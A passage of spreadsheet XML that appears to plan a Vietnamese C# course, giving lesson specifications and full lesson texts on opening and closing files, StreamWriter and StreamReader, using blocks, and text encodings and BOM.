      <c r="F32" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G32" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H32" s="10" t="inlineStr">
        <is>
          <t>Thấy vòng đời của một tệp: mở → dùng → đóng, và trạng thái tệp ở từng bước.</t>
        </is>
      </c>
      <c r="I32" s="10" t="inlineStr">
        <is>
          <t>1 cột, 2 tab</t>
        </is>
      </c>
      <c r="J32" s="10" t="inlineStr">
        <is>
          <t>Biểu tượng tệp có đèn trạng thái (Đóng xám / Đang mở xanh kèm ổ khóa). Bảng nhỏ 'Tài nguyên hệ điều hành đang giữ'.</t>
        </is>
      </c>
      <c r="K32" s="10" t="inlineStr">
        <is>
          <t>H08, H12</t>
        </is>
      </c>
      <c r="L32" s="10" t="inlineStr">
        <is>
          <t>Mở rồi đóng | Quên đóng</t>
        </is>
      </c>
      <c r="M32" s="10" t="inlineStr">
        <is>
          <t>Mở rồi đóng: new StreamReader("a.txt") → đèn xanh, bảng tài nguyên thêm 1 dòng; ReadLine; Close() → đèn xám, bảng trống.
Quên đóng: không gọi Close → tệp vẫn bị giữ.
Một chương trình khác (ví dụ Notepad) muốn ghi đè tệp → báo tệp đang được dùng.
Bước cuối: tệp chỉ được nhả khi chương trình kết thúc hoặc khi bộ gom rác dọn đối tượng, không biết lúc nào.</t>
        </is>
      </c>
      <c r="N32" s="10" t="inlineStr">
        <is>
          <t>a.txt 2 dòng</t>
        </is>
      </c>
      <c r="O32" s="10" t="inlineStr">
        <is>
          <t>Mỗi lần mở tệp phải có một lần đóng tương ứng.</t>
        </is>
      </c>
      <c r="P32" s="10" t="inlineStr">
        <is>
          <t>Hiện tượng tệp bị khóa thấy rõ trên Windows; trên macOS/Linux hành vi khóa khác.</t>
        </is>
      </c>
      <c r="Q32" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/vi-du-don-gian-ve-viec-mo-va-dong-file/index.html</t>
        </is>
      </c>
      <c r="R32" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/vi-du-don-gian-ve-viec-mo-va-dong-file/</t>
        </is>
      </c>
      <c r="S32" s="10" t="n"/>
      <c r="T32" s="12" t="n"/>
      <c r="U32" s="12" t="n"/>
      <c r="V32" s="21" t="inlineStr">
        <is>
          <t>Làm quen với việc mở và đóng file trong C#
Trong các bài học trước, chúng ta đã hiểu về tầm quan trọng của File I/O và cơ chế luồng dữ liệu (Stream). Bây giờ, hãy cùng đi vào thực tế: làm thế nào để "kết nối" ứng dụng của bạn với một tệp tin văn bản trên ổ đĩa?
Để thao tác với file, bước đầu tiên là mở file (tạo một luồng kết nối) và bước cuối cùng luôn là đóng file (giải phóng tài nguyên). Việc quản lý tài nguyên hệ thống là một kỹ năng sống còn đối với bất kỳ lập trình viên nào.
Sử dụng lớp StreamReader và StreamWriter
Để đọc và ghi file văn bản, hai lớp được sử dụng phổ biến nhất trong System.IO là StreamReader (để đọc) và StreamWriter (để ghi).
Hãy xem ví dụ cơ bản về việc tạo một file mới và ghi nội dung vào đó:
using System.IO;
// Khởi tạo StreamWriter với đường dẫn file
StreamWriter writer = new StreamWriter("du_lieu.txt");
// Ghi dữ liệu vào file
writer.WriteLine("Chào mừng bạn đến với C#!");
writer.WriteLine("Học cách làm việc với file rất thú vị.");
// Đóng file để đảm bảo dữ liệu được lưu xuống đĩa
writer.Close();
Trong đoạn mã trên, new StreamWriter("du_lieu.txt") đóng vai trò mở một "đường ống" nối từ chương trình của bạn đến tệp tin du_lieu.txt. Lệnh writer.Close() là cực kỳ quan trọng; nếu không gọi lệnh này, dữ liệu bạn ghi có thể bị treo trong bộ nhớ đệm (buffer) và không bao giờ được ghi vào tệp tin thật.
Quy tắc "Vàng" trong quản lý tài nguyên: using
Việc sử dụng phương thức .Close() thủ công tiềm ẩn rủi ro: nếu chương trình của bạn gặp lỗi (exception) trước khi lệnh Close() được thực thi, file sẽ không bao giờ được đóng, dẫn đến rò rỉ tài nguyên hệ thống.
Để khắc phục, C# cung cấp cấu trúc using. Khi khối using kết thúc, C# sẽ tự động gọi phương thức Dispose() (tương đương với việc đóng file) một cách an toàn, ngay cả khi có lỗi xảy ra.
using System.IO;
// Cách viết chuyên nghiệp và an toàn
using (StreamWriter writer = new StreamWriter("thong_tin.txt"))
{
    writer.WriteLine("Dữ liệu này được lưu an toàn.");
} 
// Tại đây, StreamWriter tự động đóng, bạn không cần gọi .Close()
Đọc dữ liệu từ file
Tương tự như việc ghi, để đọc file, chúng ta sử dụng StreamReader. Dưới đây là cách đọc một dòng từ tệp tin:
using System.IO;
if (File.Exists("du_lieu.txt"))
{
    using (StreamReader reader = new StreamReader("du_lieu.txt"))
    {
        string dongDauTien = reader.ReadLine();
        Console.WriteLine("Nội dung file: " + dongDauTien);
    }
}
Lưu ý quan trọng: Luôn kiểm tra xem file có tồn tại hay không bằng File.Exists() trước khi mở để tránh các lỗi FileNotFoundException không đáng có.
Những điểm cần ghi nhớ
Khi bắt đầu làm việc với file, hãy luôn lưu ý ba nguyên tắc sau:
Đường dẫn (Path): Nếu bạn không cung cấp đường dẫn tuyệt đối (ví dụ: C:\data\file.txt), C# sẽ hiểu là tệp tin nằm cùng thư mục với tệp thực thi .exe của chương trình.
Giải phóng tài nguyên: Luôn sử dụng cấu trúc using để đảm bảo hệ thống không bị chiếm dụng tài nguyên bởi các file chưa đóng.
Chế độ ghi (Append): Mặc định, StreamWriter sẽ ghi đè lên nội dung cũ của file. Nếu bạn muốn thêm nội dung vào cuối file hiện có mà không xóa dữ liệu cũ, hãy sử dụng constructor thứ hai: new StreamWriter("log.txt", true).
Việc thực hành mở và đóng file một cách kỷ luật ngay từ những bài đầu tiên sẽ giúp bạn xây dựng thói quen viết mã sạch, tránh được những lỗi về hiệu năng và quản lý bộ nhớ phức tạp trong các dự án lớn sau này.</t>
        </is>
      </c>
      <c r="W32" s="22" t="inlineStr">
        <is>
          <t># Ví dụ đơn giản về việc mở và đóng file
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Mô tả vòng đời của một tệp: mở, dùng, đóng.
- Dùng `StreamWriter` để ghi và `StreamReader` để đọc tệp văn bản.
- Giải thích vì sao phải đóng tệp và điều gì xảy ra nếu quên.
- Viết khối `using` để tệp luôn được đóng, kể cả khi có lỗi.
- Quan sát trạng thái tệp ở từng bước, và hậu quả của việc quên đóng, bằng hoạt động mô phỏng.
## Vòng đời của một tệp
Để làm việc với tệp, chương trình đi qua ba bước:
1. **Mở:** tạo một luồng kết nối giữa chương trình và tệp. Hệ điều hành cấp cho chương trình một **tay cầm** (handle) để truy cập tệp.
2. **Dùng:** đọc hoặc ghi dữ liệu.
3. **Đóng:** trả tay cầm lại cho hệ điều hành, giải phóng tài nguyên.
Quy tắc ghi nhớ: **mỗi lần mở tệp phải có một lần đóng tương ứng**.
## Ghi tệp với StreamWriter
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        StreamWriter writer = new StreamWriter("du_lieu.txt");   // mở tệp
        writer.WriteLine("Chào mừng bạn đến với C#!");
        writer.WriteLine("Học cách làm việc với file rất thú vị.");
        writer.Close();                                          // đóng tệp
    }
}
```
`new StreamWriter("du_lieu.txt")` mở "đường ống" từ chương trình đến tệp `du_lieu.txt` (tạo mới nếu chưa có, ghi đè nếu đã có). Lệnh `Close()` rất quan trọng: dữ liệu ghi thường nằm tạm trong **bộ đệm** (buffer), và `Close()` đẩy nó xuống tệp thật rồi trả tài nguyên lại cho hệ điều hành.
## Đọc tệp với StreamReader
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        StreamReader sr = new StreamReader("du_lieu.txt");
        string line = sr.ReadLine();
        Console.WriteLine(line);    // Chào mừng bạn đến với C#!
        sr.Close();
    }
}
```
`ReadLine()` đọc một dòng rồi chuyển sang dòng kế tiếp. Nếu tệp không tồn tại, `new StreamReader(...)` ném `FileNotFoundException`. Có thể kiểm tra trước bằng `File.Exists("du_lieu.txt")`, hoặc bắt ngoại lệ này.
## Quên đóng tệp thì sao?
Khi tệp còn mở, chương trình vẫn giữ tay cầm và tệp thường bị **khóa**. Hậu quả:
- Chương trình khác (ví dụ trình soạn thảo) không lưu đè được tệp. Trên Windows, bạn có thể gặp thông báo "The process cannot access the file ... because it is being used by another process." Trên macOS và Linux cách khóa tệp khác đi.
- Dữ liệu ghi dở có thể còn trong bộ đệm, chưa xuống tệp.
- Tài nguyên hệ thống bị giữ lâu. Tệp chỉ được nhả khi chương trình kết thúc hoặc khi bộ gom rác dọn đối tượng, mà ta không biết chính xác lúc nào.
## Dùng using để luôn đóng tệp
Gọi `Close()` thủ công có một rủi ro: nếu xảy ra lỗi trước khi chạy đến `Close()`, tệp sẽ không bao giờ được đóng. Câu lệnh **`using`** giải quyết việc này. Khi khối `using` kết thúc, C# tự gọi `Dispose()` (tương đương đóng tệp), **kể cả khi có ngoại lệ**:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        using (StreamWriter writer = new StreamWriter("thong_tin.txt"))
        {
            writer.WriteLine("Dữ liệu này được lưu an toàn.");
        }   // tự động đóng ở đây, không cần gọi Close()
        // Cú pháp gọn: tệp đóng khi kết thúc phương thức chứa nó
        using var reader = new StreamReader("thong_tin.txt");
        Console.WriteLine(reader.ReadLine());   // Dữ liệu này được lưu an toàn.
    }
}
```
Từ bài sau, ta sẽ dùng `using` cho mọi thao tác với tệp.
## Ba điều cần nhớ
- **Đường dẫn:** nếu chỉ ghi tên như `"du_lieu.txt"`, tệp được tìm trong **thư mục làm việc hiện tại** của chương trình (khi chạy bằng `dotnet run` thường là thư mục dự án). Muốn chắc chắn, dùng đường dẫn đầy đủ.
- **Ghi đè hay nối thêm:** mặc định `StreamWriter` **ghi đè** nội dung cũ. Muốn nối thêm vào cuối tệp, dùng tham số thứ hai: `new StreamWriter("log.txt", true)`.
- **Luôn đóng tệp:** dùng `using` để không phải nhớ gọi `Close()`.
## Hoạt động: Mở rồi đóng, hoặc quên đóng
Mô phỏng dưới đây chạy một chương trình mở `a.txt`, đọc một dòng rồi đóng hoặc quên đóng. Hình minh họa có đèn trạng thái của tệp, nội dung tệp (hai dòng "Xin chào" và "Học C#") và bảng "Tài nguyên hệ điều hành đang giữ". Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Mở rồi đóng**. Dòng `new StreamReader("a.txt")` làm đèn chuyển sang xanh, ghi "Đang mở (khóa)", và bảng tài nguyên có thêm dòng "Tệp a.txt (handle)". `ReadLine()` lấy dòng đầu "Xin chào" (dòng này được tô nổi bật) và chương trình in nó ra, tệp vẫn đang mở. Đến `sr.Close()`, đèn chuyển sang xám với chữ "Đã đóng" và bảng tài nguyên hiện "(không có)".
- Mở tab **Quên đóng**. Hai bước đầu giống tab trước. Nhưng dòng cuối chỉ là chú thích "quên gọi sr.Close()", nên đèn vẫn xanh và bảng tài nguyên vẫn còn dòng a.txt. Sau đó bạn thấy thẻ cảnh báo "Notepad không lưu được" với thông báo tệp đang được tiến trình khác dùng, vì tệp vẫn bị chương trình của ta giữ.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/vi-du-don-gian-ve-viec-mo-va-dong-file/" title="Mở và đóng tệp" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi lần mở tệp phải có một lần đóng tương ứng. Tệp không đóng sẽ bị giữ, và chỉ được nhả khi chương trình kết thúc hoặc khi bộ gom rác dọn đối tượng.
## Tóm tắt
- Tệp có vòng đời **mở, dùng, đóng**; mỗi lần mở cần một lần đóng.
- `StreamWriter` ghi văn bản, `StreamReader` đọc văn bản; cả hai nằm trong `System.IO`.
- Quên đóng tệp làm tệp bị khóa, dữ liệu có thể kẹt trong bộ đệm và tốn tài nguyên.
- Câu lệnh `using` tự đóng tệp, kể cả khi có lỗi, nên là cách viết nên dùng.
- Đường dẫn tương đối được hiểu theo thư mục làm việc hiện tại.
- `new StreamWriter(path, true)` nối thêm vào cuối tệp thay vì ghi đè.</t>
        </is>
      </c>
    </row>
    <row r="33" ht="409.6" customHeight="1" s="18">
      <c r="A33" s="10" t="n">
        <v>33</v>
      </c>
      <c r="B33" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C33" s="10" t="inlineStr">
        <is>
          <t>Đọc File Văn bản</t>
        </is>
      </c>
      <c r="D33" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu lớp StreamReader</t>
        </is>
      </c>
      <c r="E33" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F33" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G33" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H33" s="10" t="inlineStr">
        <is>
          <t>Thấy StreamReader đọc từng ký tự và giữ một con trỏ vị trí trong tệp.</t>
        </is>
      </c>
      <c r="I33" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J33" s="10" t="inlineStr">
        <is>
          <t>Trình xem tệp dạng lưới ký tự (mỗi ô một ký tự, ↵ cho xuống dòng). Con trỏ đọc (tam giác) nằm dưới ô hiện tại; ô đã đọc nền xanh nhạt.</t>
        </is>
      </c>
      <c r="K33" s="10" t="inlineStr">
        <is>
          <t>H12, H11</t>
        </is>
      </c>
      <c r="L33" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M33" s="10" t="inlineStr">
        <is>
          <t>Tệp chứa "Hi↵OK". Mở StreamReader, con trỏ ở ký tự đầu.
Peek() → 72 ('H'), con trỏ không di chuyển.
Read() → 72 ('H'), con trỏ sang 'i'.
Read() → 'i'; Read() → ký tự xuống dòng (10).
Đọc tiếp 'O', 'K'; Read() → −1 và EndOfStream = true.
Xong.</t>
        </is>
      </c>
      <c r="N33" s="10" t="inlineStr">
        <is>
          <t>"Hi\nOK"</t>
        </is>
      </c>
      <c r="O33" s="10" t="inlineStr">
        <is>
          <t>Peek nhìn trước không di chuyển; Read đọc rồi tiến; hết tệp trả −1.</t>
        </is>
      </c>
      <c r="P33" s="10" t="inlineStr">
        <is>
          <t>Read() trả int (mã ký tự) để có thể trả −1; ép sang char để hiển thị.</t>
        </is>
      </c>
      <c r="Q33" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/gioi-thieu-lop-streamreader/index.html</t>
        </is>
      </c>
      <c r="R33" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/gioi-thieu-lop-streamreader/</t>
        </is>
      </c>
      <c r="S33" s="10" t="n"/>
      <c r="T33" s="12" t="n"/>
      <c r="U33" s="12" t="n"/>
      <c r="V33" s="21" t="inlineStr">
        <is>
          <t>Lớp StreamReader: Cầu nối tới Dữ liệu Văn bản
Trong lập trình C#, khi làm việc với các file văn bản, chúng ta thường gặp phải nhu cầu đọc dữ liệu theo từng ký tự, từng dòng, hoặc toàn bộ nội dung dưới dạng chuỗi. Mặc dù lớp FileStream (mà bạn có thể đã biết hoặc sẽ tìm hiểu trong các bài học khác về file nhị phân) cho phép chúng ta đọc dữ liệu từ file, nhưng nó hoạt động ở cấp độ byte. Điều này có nghĩa là FileStream không tự động hiểu được các ký tự, mã hóa (encoding) hay cấu trúc dòng của văn bản.
Đây chính là lúc lớp StreamReader phát huy tác dụng. StreamReader là một lớp tiện ích được xây dựng trên nền tảng của các Stream (ví dụ FileStream) để cung cấp một cách thức dễ dàng và hiệu quả hơn để đọc dữ liệu dựa trên ký tự từ một luồng. Nó đóng vai trò như một "phiên dịch viên", chuyển đổi chuỗi byte từ Stream thành các ký tự theo một bộ mã hóa cụ thể.
Mục tiêu chính của StreamReader là:
Đọc các ký tự thay vì byte.
Xử lý các vấn đề về mã hóa (encoding) để đảm bảo các ký tự được đọc chính xác.
Cung cấp các phương thức tiện lợi để đọc toàn bộ dòng hoặc toàn bộ nội dung file.
Các Constructor của StreamReader và Mối quan hệ với FileStream
StreamReader cung cấp nhiều constructor khác nhau để khởi tạo, tùy thuộc vào cách bạn muốn cung cấp luồng dữ liệu và chỉ định mã hóa. Điều quan trọng cần nhớ là StreamReader luôn cần một luồng cơ sở (Stream) để hoạt động. Khi bạn cung cấp một đường dẫn file trực tiếp, StreamReader sẽ tự động tạo một FileStream ngầm định để làm việc.
Dưới đây là các constructor phổ biến của StreamReader:
1. Khởi tạo từ một Stream hiện có
Đây là cách cơ bản nhất, cho phép bạn truyền vào một đối tượng Stream đã được khởi tạo trước đó.
using System.IO;
using System.Text;
// Ví dụ: Tạo FileStream trước, sau đó truyền vào StreamReader
string filePath = "myTextFile.txt";
try
{
    // Tạo FileStream với quyền đọc
    FileStream fs = new FileStream(filePath, FileMode.Open, FileAccess.Read);
    // Khởi tạo StreamReader từ FileStream.
    // Mặc định, StreamReader sẽ cố gắng phát hiện mã hóa từ BOM (nếu có)
    // hoặc sử dụng UTF-8 không BOM nếu không có BOM hoặc không thể phát hiện.
    using (StreamReader reader = new StreamReader(fs))
    {
        // Bây giờ bạn có thể sử dụng reader để đọc dữ liệu
        // Ví dụ: string line = reader.ReadLine(); (sẽ được học chi tiết sau)
        Console.WriteLine("StreamReader được khởi tạo thành công từ FileStream.");
    } // fs cũng sẽ được đóng khi reader bị Dispose
}
catch (FileNotFoundException)
{
    Console.WriteLine($"Lỗi: Không tìm thấy file tại {filePath}");
}
catch (Exception ex)
{
    Console.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
}
Trong ví dụ trên, StreamReader nhận trách nhiệm đóng FileStream cơ bản khi nó được Dispose.
2. Khởi tạo từ một Stream với Encoding cụ thể
Bạn có thể chỉ định rõ mã hóa ngay khi khởi tạo để đảm bảo dữ liệu được đọc chính xác, đặc biệt khi bạn biết chắc mã hóa của file.
using System.IO;
using System.Text;
string filePath = "myAnsiFile.txt";
try
{
    FileStream fs = new FileStream(filePath, FileMode.Open, FileAccess.Read);
    // Khởi tạo StreamReader với mã hóa Windows-1252 (ANSI)
    using (StreamReader reader = new StreamReader(fs, Encoding.GetEncoding("Windows-1252")))
    {
        Console.WriteLine("StreamReader được khởi tạo thành công với mã hóa Windows-1252.");
        // Đọc dữ liệu...
    }
}
catch (FileNotFoundException)
{
    Console.WriteLine($"Lỗi: Không tìm thấy file tại {filePath}");
}
catch (Exception ex)
{
    Console.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
}
3. Khởi tạo trực tiếp từ đường dẫn file
Đây là cách tiện lợi nhất khi bạn chỉ cần đọc một file văn bản. StreamReader sẽ tự động tạo một FileStream ngầm định.
using System.IO;
using System.Text;
string filePath = "anotherTextFile.txt";
try
{
    // Khởi tạo StreamReader trực tiếp từ đường dẫn.
    // Tương tự như constructor đầu tiên, nó sẽ dùng UTF-8 không BOM hoặc phát hiện BOM.
    using (StreamReader reader = new StreamReader(filePath))
    {
        Console.WriteLine("StreamReader được khởi tạo thành công từ đường dẫn file.");
        // Đọc dữ liệu...
    } // FileStream ngầm định cũng sẽ được đóng
}
catch (FileNotFoundException)
{
    Console.WriteLine($"Lỗi: Không tìm thấy file tại {filePath}");
}
catch (Exception ex)
{
    Console.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
}
4. Khởi tạo từ đường dẫn file với Encoding cụ thể
Kết hợp sự tiện lợi của việc cung cấp đường dẫn và khả năng chỉ định mã hóa.
using System.IO;
using System.Text;
string filePath = "utf8File.txt";
try
{
    // Khởi tạo StreamReader từ đường dẫn và mã hóa UTF-8
    using (StreamReader reader = new StreamReader(filePath, Encoding.UTF8))
    {
        Console.WriteLine("StreamReader được khởi tạo thành công từ đường dẫn và mã hóa UTF-8.");
        // Đọc dữ liệu...
    }
}
catch (FileNotFoundException)
{
    Console.WriteLine($"Lỗi: Không tìm thấy file tại {filePath}");
}
catch (Exception ex)
{
    Console.WriteLine($"Đã xảy ra lỗi: {ex.Message}");
}
5. Các Constructor nâng cao với tùy chọn phát hiện BOM
Một số constructor khác cho phép bạn kiểm soát chi tiết hơn việc phát hiện Byte Order Mark (BOM). BOM là một chuỗi byte đặc biệt ở đầu file Unicode (như UTF-8, UTF-16) để chỉ ra mã hóa và thứ tự byte.
Ví dụ: StreamReader(string path, Encoding encoding, bool detectEncodingFromByteOrderMarks)
Nếu detectEncodingFromByteOrderMarks là true (mặc định cho nhiều constructor có Encoding), StreamReader sẽ kiểm tra BOM trước. Nếu tìm thấy BOM, nó sẽ ưu tiên BOM hơn mã hóa bạn đã chỉ định.
Nếu detectEncodingFromByteOrderMarks là false, StreamReader sẽ chỉ sử dụng mã hóa bạn đã chỉ định và bỏ qua bất kỳ BOM nào (có thể gây lỗi nếu mã hóa không khớp).
Lưu ý quan trọng về quản lý tài nguyên:StreamReader triển khai giao diện IDisposable. Điều này có nghĩa là bạn luôn phải đảm bảo nó được giải phóng đúng cách sau khi sử dụng để tránh rò rỉ tài nguyên (như giữ file bị khóa). Cách tốt nhất là sử dụng câu lệnh using, như đã minh họa trong các ví dụ trên. Khi StreamReader được Dispose, nó cũng sẽ tự động Dispose luồng cơ sở (FileStream) mà nó đang sử dụng.
Tùy chọn Mã hóa (Encoding) khi Đọc File
Mã hóa là một khái niệm cực kỳ quan trọng khi làm việc với file văn bản. Một file văn bản không chỉ là một chuỗi các ký tự; nó là một chuỗi các byte được lưu trữ trên đĩa. Mã hóa là quy tắc hoặc bản đồ cho biết cách chuyển đổi các byte đó thành các ký tự mà chúng ta có thể đọc và hiểu được.
Nếu bạn đọc một file bằng một mã hóa không chính xác, kết quả sẽ là "mojibake" – các ký tự bị biến dạng, không thể đọc được. Ví dụ, một file được lưu bằng Windows-1252 nhưng lại được đọc bằng UTF-8 có thể hiển thị các ký tự tiếng Việt hoặc ký tự đặc biệt khác một cách sai lệch.
StreamReader được thiết kế để xử lý vấn đề này bằng cách cho phép bạn chỉ định mã hóa mong muốn.
Các loại mã hóa phổ biến:
Encoding.UTF8: Mã hóa phổ biến nhất hiện nay, hỗ trợ hầu hết các ký tự trên thế giới. Nó là mã hóa mặc định mà StreamReader cố gắng sử dụng nếu không có BOM hoặc mã hóa cụ thể nào được chỉ định.
Encoding.Unicode (UTF-16): Thường được sử dụng bởi các ứng dụng Windows. Mã hóa này sử dụng 2 byte (hoặc 4 byte) cho mỗi ký tự và thường có Byte Order Mark (BOM) ở đầu file để chỉ ra thứ tự byte.
Encoding.ASCII: Chỉ hỗ trợ các ký tự tiếng Anh cơ bản (0-127). Rất ít khi được dùng cho các file hiện đại.
Encoding.GetEncoding("Windows-1252"): Còn được gọi là mã hóa ANSI trong ngữ cảnh Windows phương Tây. Đây là một mã hóa kế thừa (legacy encoding) phổ biến cho các file cũ hoặc file được tạo bởi các ứng dụng không hỗ trợ Unicode.
Encoding.GetEncoding("shift_jis"), Encoding.GetEncoding("GB2312"), v.v.: Các mã hóa cụ thể cho các ngôn ngữ khác.
Cách StreamReader xử lý mã hóa và BOM:
Khi bạn khởi tạo StreamReader mà không chỉ định Encoding (ví dụ new StreamReader(filePath)), nó sẽ thực hiện các bước sau:
Nó sẽ kiểm tra xem file có chứa Byte Order Mark (BOM) cho UTF-8, UTF-16 (Unicode), hoặc UTF-32 hay không.
Nếu tìm thấy BOM, nó sẽ sử dụng mã hóa tương ứng.
Nếu không tìm thấy BOM, nó sẽ mặc định sử dụng Encoding.UTF8 (không có BOM).
Khi bạn chỉ định Encoding nhưng không chỉ định detectEncodingFromByteOrderMarks hoặc để nó là true (ví dụ new StreamReader(filePath, Encoding.UTF8)):
StreamReader vẫn sẽ ưu tiên kiểm tra BOM.
Nếu BOM được tìm thấy và nó khớp với mã hóa được chỉ định, hoặc là một mã hóa Unicode khác mà StreamReader có thể nhận dạng, nó sẽ sử dụng mã hóa được phát hiện.
Nếu không có BOM hoặc BOM không được nhận dạng, nó sẽ sử dụng mã hóa bạn đã chỉ định.
Thực hành tốt nhất:
Luôn cố gắng lưu file ở định dạng UTF-8 (có hoặc không có BOM). Đây là mã hóa chuẩn hiện đại và được hỗ trợ rộng rãi nhất.
Nếu bạn biết mã hóa của file, hãy luôn chỉ định nó khi tạo StreamReader. Điều này loại bỏ sự không chắc chắn và đảm bảo đọc đúng.
Đối với các file cũ hoặc không rõ mã hóa, hãy thử nghiệm. Đôi khi bạn cần thử nhiều mã hóa khác nhau (ví dụ: UTF8, Unicode, Windows-1252) để tìm ra mã hóa chính xác. Tùy chọn detectEncodingFromByteOrderMarks = true có thể hữu ích trong trường hợp này.
Sau khi đã khởi tạo một đối tượng StreamReader với các tùy chọn phù hợp, bạn đã sẵn sàng để bắt đầu đọc dữ liệu từ file. Các bài học tiếp theo sẽ hướng dẫn bạn cách sử dụng các phương thức như ReadLine(), ReadToEnd() và Read() để trích xuất nội dung từ file văn bản.</t>
        </is>
      </c>
      <c r="W33" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu lớp StreamReader
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích `StreamReader` là lớp đọc ký tự, xây dựng trên một `Stream` (thường là `FileStream`).
- Chọn cách khởi tạo `StreamReader` từ đường dẫn hoặc từ `Stream`, có hoặc không chỉ định mã hóa.
- Giải thích mã hóa (encoding) và BOM ảnh hưởng thế nào đến việc đọc đúng chữ.
- Phân biệt `Peek()` và `Read()`, và biết vì sao `Read()` trả về `int`.
- Quan sát con trỏ đọc di chuyển qua từng ký tự bằng hoạt động mô phỏng.
## StreamReader làm gì?
Ở bài trước bạn biết `FileStream` làm việc với **byte**. Nó không hiểu ký tự, mã hóa hay dòng văn bản. Khi đọc tệp văn bản, ta muốn nhận **ký tự** và **dòng chữ**, và đó là việc của `StreamReader`.
`StreamReader` hoạt động như một "phiên dịch viên": nó đứng trên một `Stream`, đọc byte rồi dịch thành ký tự theo một bộ mã hóa. Nhờ đó bạn có thể:
- Đọc ký tự thay vì byte.
- Để .NET lo chuyện mã hóa.
- Dùng các phương thức tiện lợi để đọc từng dòng hoặc cả tệp.
`StreamReader` luôn cần một stream cơ sở. Nếu bạn đưa đường dẫn tệp, nó tự tạo `FileStream` ngầm bên trong.
## Các cách khởi tạo
```csharp
using System;
using System.IO;
using System.Text;
public class Program
{
    public static void Main()
    {
        // 1. Từ đường dẫn (cách tiện nhất)
        using (var r1 = new StreamReader("a.txt"))
        {
            Console.WriteLine("Đã mở bằng đường dẫn.");
        }
        // 2. Từ đường dẫn, chỉ định mã hóa
        using (var r2 = new StreamReader("a.txt", Encoding.UTF8))
        {
            Console.WriteLine("Đã mở với UTF-8.");
        }
        // 3. Từ một Stream có sẵn
        var fs = new FileStream("a.txt", FileMode.Open, FileAccess.Read);
        using (var r3 = new StreamReader(fs))
        {
            Console.WriteLine("Đã mở từ FileStream.");
        }   // đóng r3 cũng đóng luôn fs
    }
}
```
Chương trình này cần tệp `a.txt` tồn tại trong thư mục làm việc, nếu không sẽ ném `FileNotFoundException`. `StreamReader` triển khai `IDisposable`, nên luôn dùng `using` để tệp được đóng, và khi nó được đóng thì stream cơ sở cũng đóng theo.
## Mã hóa (Encoding) và BOM
Tệp văn bản thực chất là một dãy byte. **Mã hóa** là quy tắc cho biết cách đổi byte thành ký tự. Đọc sai mã hóa sẽ ra chữ biến dạng (người ta gọi là "mojibake"), đặc biệt với tiếng Việt có dấu.
Các mã hóa thường gặp:
- `Encoding.UTF8`: phổ biến nhất hiện nay, hỗ trợ hầu hết ký tự trên thế giới, và là mặc định của `StreamReader`.
- `Encoding.Unicode` (UTF-16): dùng nhiều trong ứng dụng Windows.
- `Encoding.ASCII`: chỉ gồm ký tự tiếng Anh cơ bản (mã 0-127), không đọc được tiếng Việt có dấu.
**BOM** (Byte Order Mark) là vài byte đặc biệt ở đầu một số tệp Unicode để báo mã hóa. Khi bạn không chỉ định mã hóa, hoặc dùng tham số `detectEncodingFromByteOrderMarks` bằng `true`, `StreamReader` kiểm tra BOM trước. Gặp BOM thì dùng mã hóa tương ứng, không thì dùng mã hóa mặc định (hoặc mã hóa bạn chỉ định).
Lời khuyên: **hãy lưu và đọc tệp bằng UTF-8**. Nếu biết chắc mã hóa của tệp, hãy chỉ định nó khi tạo `StreamReader`.
Lưu ý: một số mã hóa cũ như `Windows-1252` không có sẵn trong .NET hiện đại. Muốn dùng `Encoding.GetEncoding("Windows-1252")` bạn phải đăng ký thêm nhà cung cấp mã hóa (gói `System.Text.Encoding.CodePages`). Với người mới, chỉ cần dùng UTF-8.
## Đọc từng ký tự: Peek và Read
Hai phương thức đầu tiên cần biết đều làm việc ở mức ký tự:
- `Peek()`: **nhìn trước** ký tự kế tiếp, **không** di chuyển con trỏ.
- `Read()`: đọc ký tự kế tiếp rồi **đẩy con trỏ tiến một vị trí**.
Cả hai trả về `int` là mã của ký tự (ví dụ `H` có mã 72). Khi hết tệp, chúng trả về **`-1`**. Đó là lý do kiểu trả về là `int` chứ không phải `char`: để có chỗ cho giá trị `-1`. Muốn in ký tự thay vì mã số, ép kiểu `(char)`. Thuộc tính `EndOfStream` cho biết con trỏ đã ở cuối tệp hay chưa.
Giả sử `a.txt` có hai dòng `Hi` và `OK`, ngăn cách bằng ký tự xuống dòng `\n` (mã 10):
